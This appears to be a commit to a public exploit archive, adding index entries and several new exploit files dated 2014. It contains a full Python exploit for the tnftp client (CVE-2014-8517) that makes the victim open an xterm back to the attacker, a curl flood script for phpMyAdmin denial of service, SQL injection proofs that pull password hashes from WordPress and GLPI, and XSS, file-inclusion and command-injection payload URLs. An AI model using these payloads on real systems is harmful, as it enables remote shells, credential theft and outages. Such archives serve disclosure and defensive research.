Updated 12_16_2014
This commit is contained in:
parent
8da471b3fa
commit
b4ae4f9045
21 changed files with 1587 additions and 1 deletions
22
files.csv
22
files.csv
@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
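--- a/platforms/bsd/remote/35427.py
+++ b/platforms/bsd/remote/35427.py
@@ -0,0 +1,148 @@
+#!/usr/bin/env python2
+#
+# Exploit Title: [tnftp BSD exploit]
+# Date: [11/29/2014]
+# Exploit Author: [dash]
+# Vendor Homepage: [www.freebsd.org]
+# Version: [FreeBSD 8/9/10]
+# Tested on: [FreeBSD 9.3]
+# CVE : [CVE-2014-8517]
+
+# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
+# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
+#
+# 29 Nov 2014 by dash@hack4.org
+#
+# usage:
+#
+# redirect the vulnerable ftp client requests for http to your machine
+#
+# client will do something like:
+# ftp http://ftp.freebsd.org/data.txt
+#
+# you will intercept the dns request and redirect victim to your fake webserver ip
+#
+# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
+# probably do also xhost+victimip
+#
+# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
+#
+# sadly you cannot put a slash behind the | also www-encoded is not working
+# plus problems with extra pipes
+# this renders a lot of usefull commands useless
+# so xterm -display it was ;)
+#
+# *dirty* *dirdy* *dyrdy* *shell* !
+#
+
+import os
+import sys
+import time
+import socket
+
+
+def usage():
+print "CVE-2014-8517 tnftp exploit"
+print "by dash@hack4.org in 29 Nov 2014"
+print
+print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
+print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
+
+#bind a fake webserver on 0.0.0.0 port 80
+def webserveRedirect(redirect):
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+s.bind(("0.0.0.0",80))
+s.listen(3)
+h, c = s.accept()
+
+#wait for request
+#print h.recv(1024)
+
+#send 302
+print "[+] Sending redirect :>"
+h.send(redirect)
+s.close()
+return 0
+
+#bind a fake webserver on port %rport
+def deliverUgga(owned):
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+s.bind(("0.0.0.0",rport))
+s.listen(3)
+h, c = s.accept()
+
+# print h.recv(1024)
+print "[+] Deliver some content (shell is spwaned now)"
+h.send(owned)
+s.close()
+
+return 0
+
+owned="""HTTP/1.1 200 Found
+Date: Fri, 29 Nov 2014 1:00:03 GMT
+Server: Apache
+Vary: Accept-Encoding
+Content-Length: 5
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+
+
+ugga ugga
+"""
+
+if(os.getuid())!=0:
+print "[-] Sorry, you need root to bind port 80!"
+sys.exit(1)
+
+if len(sys.argv)<3:
+usage()
+sys.exit(1)
+
+rip = sys.argv[1]
+rport = int(sys.argv[2])
+revip = sys.argv[3]
+
+print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
+print "[+] Dont forget to run Xnest -ac :1"
+
+# ok, lets use xterm -display
+cmd = "xterm -display %s:1" % (revip)
+cmd = cmd.replace(" ","%20")
+
+print "[+] Payload: [%s]" % cmd
+
+redirect = "HTTP/1.1 302\r\n"\
+"Content-Type: text/html\r\n"\
+"Connection: keep-alive\r\n"\
+"Location: http://%s:%d/cgi-bin/|%s\r\n"\
+"\r\n\r\n" % (rip,rport,cmd)
+
+#child process owned data delivery
+uggapid = os.fork()
+if uggapid == 0:
+uggapid = os.getpid()
+deliverUgga(owned)
+else:
+#child proces for webserver redirect
+webpid = os.fork()
+if webpid == 0:
+webpid = os.getpid()
+webserveRedirect(redirect)
+
+
+
+#childs, come home!
+try:
+os.waitpid(webpid,0)
+except:
+pass
+try:
+os.waitpid(uggapid,0)
+except:
+pass
+
+#oh wait :>
+time.sleep(5)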
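--- a/platforms/php/dos/35539.txt
+++ b/platforms/php/dos/35539.txt
@@ -0,0 +1,42 @@
+=============
+DESCRIPTION:
+=============
+A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
+before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
+cause a denial of service (resource consumption) via a long password.
+CVE-2014-9218 was assigned
+
+=============
+Time Line:
+=============
+December 3, 2014 - A phpMyAdmin update and the security advisory is
+published.
+
+=============
+Proof of Concept:
+=============
+
+*1 - Create the payload.*
+
+$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
+{1..1000000} >> payload
+
+*2 - Performing the Denial of Service attack.*
+
+$ for i in `seq 1 150`; do (curl --data @payload
+http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
+
+=============
+Authors:
+=============
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+=============
+
+References:
+====================================================================
+
+*
+http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
+* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php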
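--- a/platforms/php/webapps/35505.txt
+++ b/platforms/php/webapps/35505.txt
@@ -0,0 +1,35 @@
+# Exploit Title: WP Symposium 14.10 SQL Injection
+# Date: 22-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
+# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
+# Category: webapps
+# CVE: CVE-2014-8810
+
+1. Description
+
+$_POST['tray'] is not escaped.
+
+File: wp-symposium\ajax\mail_functions.php
+$tray = $_POST['tray'];
+$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
+
+http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
+
+2. Proof of Concept
+
+Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
+
+<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
+<input type="hidden" name="action" value="getMailMessage">
+Message ID: <input type="text" name="mid"><br />
+SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
+<input type="submit" value="Inject">
+</form>
+
+Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
+
+3. Solution:
+
+Update to version 14.11
+http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
+https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip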
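--- a/platforms/php/webapps/35520.txt
+++ b/platforms/php/webapps/35520.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47073/info
+
+Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Claroline 1.10 is vulnerable; other versions may also be affected.
+
+"><script>alert(0)</script>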
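--- a/platforms/php/webapps/35521.txt
+++ b/platforms/php/webapps/35521.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/47074/info
+
+osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
+
+osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected.
+
+
+Cross-site scripting:
+
+http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
+
+
+Local file include:
+
+http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
+
+http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00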
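--- a/platforms/php/webapps/35522.txt
+++ b/platforms/php/webapps/35522.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47077/info
+
+Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+[code]
+GET / HTTP/1.1
+Cookie: cms_username=admin">[xss]<
+[/code]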
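--- a/platforms/php/webapps/35523.txt
+++ b/platforms/php/webapps/35523.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47078/info
+
+Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Tracks 1.7.2 is vulnerable; other versions may also be affected.
+
+http://example.com/todos/tag/'"--></style></script><script>alert(0x000238)</script>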
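--- a/platforms/php/webapps/35524.txt
+++ b/platforms/php/webapps/35524.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47085/info
+
+XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script>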
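--- a/platforms/php/webapps/35525.txt
+++ b/platforms/php/webapps/35525.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47086/info
+
+GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+GuppY 4.6.14 is vulnerable; other versions may also be affected.
+
+http://www.example.com/links.php?lng=fr [sql Injection]
+http://www.example.com/guestbk.php?lng=fr [sql Injection]
+http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]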
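--- a/platforms/php/webapps/35526.txt
+++ b/platforms/php/webapps/35526.txt
@@ -0,0 +1,96 @@
+source: http://www.securityfocus.com/bid/47089/info
+
+YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+YaCOMAS 0.3.6 is vulnerable; other versions may also be affected.
+
+===================================================================
+YaCOMAS 0.3.6 Multiple vulnerability
+===================================================================
+
+Software: Yacomas 0.3.6
+Vendor: http://yacomas.sourceforge.net/
+Vuln Type: Multiple Vulnerability
+Download link: http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
+Author: Pr@fesOr X
+contact: profesor_x(at)otmail.com
+Home: www.ccat.edu.mx
+Company: Centro de Investigaciones en Alta Tecnologia
+
+
+
+=========================
+--Description XSS --
+=========================
+
+Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
+
+Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
+
+===============================
+--= Attack details No. 1 =--
+===============================
+
+This vulnerability affects /yacomas/asistente/index.php.
+
+
+http://www.site.com/yacomas/asistente/index.php?opc=1
+
+
+--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
+
+
+--The input is reflected inside a tag element between double quotes.
+
+
+--details: can you inyect this in the HTTP headers whit this data:
+
+-----------------------
+C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
+------------------------
+
+
+===============================
+--= Vulnerable forms and variables =--
+===============================
+
+S_apellidos
+s_ciudad
+s_login
+s_mail
+s_nombrep
+s_org
+
+
+===============================
+--= Attack XSS details No. 2 =--
+===============================
+
+http://www.site.com/yacomas/admin/index.php
+
+
+--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
+
+------------------------------------------
+
+S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
+
+-------------------------------------------------------------------
+
+
+==========================================
+--= Attack XSS remote code execution No. 2 =--
+==========================================
+
+http://www.site.com/yacomas/admin/index.php
+
+
+--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
+
+------------------------------------------
+
+S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
+
+-------------------------------------------------------------------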
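--- a/platforms/php/webapps/35528.txt
+++ b/platforms/php/webapps/35528.txt
@@ -0,0 +1,40 @@
+# Exploit Title: GLPI 0.85 Blind SQL Injection
+# Date: 28-11-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
+# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
+# CVE: CVE-2014-9258
+# Category: webapps
+
+1. Description
+
+$_GET['condition'] is not escaped correctly.
+
+File: ajax\getDropdownValue.php
+if (isset($_GET['condition']) && !empty($_GET['condition'])) {
+$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
+}
+if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
+$where .= " AND ".$_GET['condition']." ";
+}
+$query = "SELECT `$table`.* $addselect
+FROM `$table`
+$addjoin
+$where
+ORDER BY $add_order `$table`.`completename`
+$LIMIT";
+
+if ($result = $DB->query($query)) {
+
+}
+
+http://security.szurek.pl/glpi-085-blind-sql-injection.html
+
+2. Proof of Concept
+
+http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
+
+3. Solution:
+
+Update to version 0.85.1
+http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
+https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz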
655
platforms/php/webapps/35541.txt
Executable file
655
platforms/php/webapps/35541.txt
Executable file
@ -0,0 +1,655 @@
?Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities
Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched
Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)
Description:
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input, check the network protocol used
to access the site.
Vulnerability: SC1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3
Description:
This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed on the victims browser, within the context of
that user and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a Phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html
Solution:
Validate all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) against expected Type,
Length and where possible, Format and Range characteristics. Reject
any data that fails validation.
Sanitise all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) by converting potentially
dangerous characters (listed below) into HTML entities such as > < etc
using output encoding.
|
||||
By combining proper input validation with effective input sanitisation
|
||||
and output encoding, Cross Site Scripting vulnerabilities will be
|
||||
mitigated.
|
||||
[1] <> (triangular parenthesis)
|
||||
[2] " (quotation mark)
|
||||
[3] ' (single apostrophe)
|
||||
[4] % (percent sign)
|
||||
[5] ; (semicolon)
|
||||
[6] () (parenthesis)
|
||||
[7] & (ampersand sign)
|
||||
[8] + (plus sign)
|
||||
[9] / (forward slash)
|
||||
[10] | (pipe)
|
||||
[11] [] (square brackets)
|
||||
[12] : (colon)
|
||||
|
||||
Information
|
||||
URI: /pages/preview.php
|
||||
Parameter: sort (GET)
|
||||
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
|
||||
|
||||
Vulnerability: 44967
|
||||
Name: CGI Generic Command Execution (timebased)
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 4
|
||||
Risk: 40
|
||||
CVSS Base Score: 7.5
|
||||
|
||||
Description:
|
||||
The remote web server hosts CGI scripts that fail to adequately
|
||||
sanitize request strings. By leveraging this issue, an attacker may be
|
||||
able to execute arbitrary commands on the remote host.
|
||||
Note that this script uses a timebased detection method which is less
|
||||
reliable than the basic method.
|
||||
|
||||
Solution:
|
||||
Restrict access to the vulnerable application. Contact the
|
||||
vendor for a patch or upgrade.
|
||||
|
||||
Information:
|
||||
Using the GET HTTP method, Nessus found that:
|
||||
|
||||
+ The following resources may be vulnerable to arbitrary command
|
||||
execution (time based) :
|
||||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||||
|
||||
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
|
||||
/pages/themes.php?lastlevelchange=%26%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%20ping%20n%203%20127.0.0.1%20%7C
|
||||
|
||||
References:
|
||||
CWE: 20
|
||||
CWE: 713
|
||||
CWE: 722
|
||||
CWE: 727
|
||||
CWE: 74
|
||||
CWE: 77
|
||||
CWE: 78
|
||||
|
||||
–-----------------------------------------------------------------------------------------------------
|
||||
Vulnerability: 43160
|
||||
Name: CGI Generic SQL Injection (blind, time based)
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 4
|
||||
Risk: 40
|
||||
CVSS Base Score: 7.5
|
||||
|
||||
Description
|
||||
By sending specially crafted parameters to one or more CGI scripts
|
||||
hosted on the remote web server, Nessus was able to get a slower
|
||||
response, which suggests that it may have been able to modify the
|
||||
behavior of the application and directly access the underlying
|
||||
database.
|
||||
An attacker may be able to exploit this issue to bypass
|
||||
authentication, read confidential data, modify the remote database, or
|
||||
even take control of the remote operating system.
|
||||
Note that this script is experimental and may be prone to false positives.
|
||||
|
||||
Solution:
|
||||
Modify the affected CGI scripts so that they properly escape arguments.
|
||||
|
||||
Information:
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to blind SQL injection
|
||||
(time based) :
|
||||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||||
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20%20
|
||||
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
|
||||
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
|
||||
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||||
|
||||
References
|
||||
CWE: 20
|
||||
CWE: 713
|
||||
CWE: 722
|
||||
CWE: 727
|
||||
CWE: 751
|
||||
CWE: 77
|
||||
CWE: 801
|
||||
CWE: 810
|
||||
CWE: 89
|
||||
|
||||
–---------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 55903
|
||||
Name: CGI Generic XSS (extended patterns)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 4.3
|
||||
|
||||
Description
|
||||
The remote web server hosts one or more CGI scripts that fail to
|
||||
adequately sanitize request strings with malicious JavaScript. By
|
||||
leveraging this issue, an attacker may be able to cause arbitrary HTML
|
||||
and script code to be executed in a user's browser within the security
|
||||
context of the affected site. These XSS vulnerabilities are likely to
|
||||
be 'nonpersistent' or 'reflected'.
|
||||
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor for
|
||||
a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
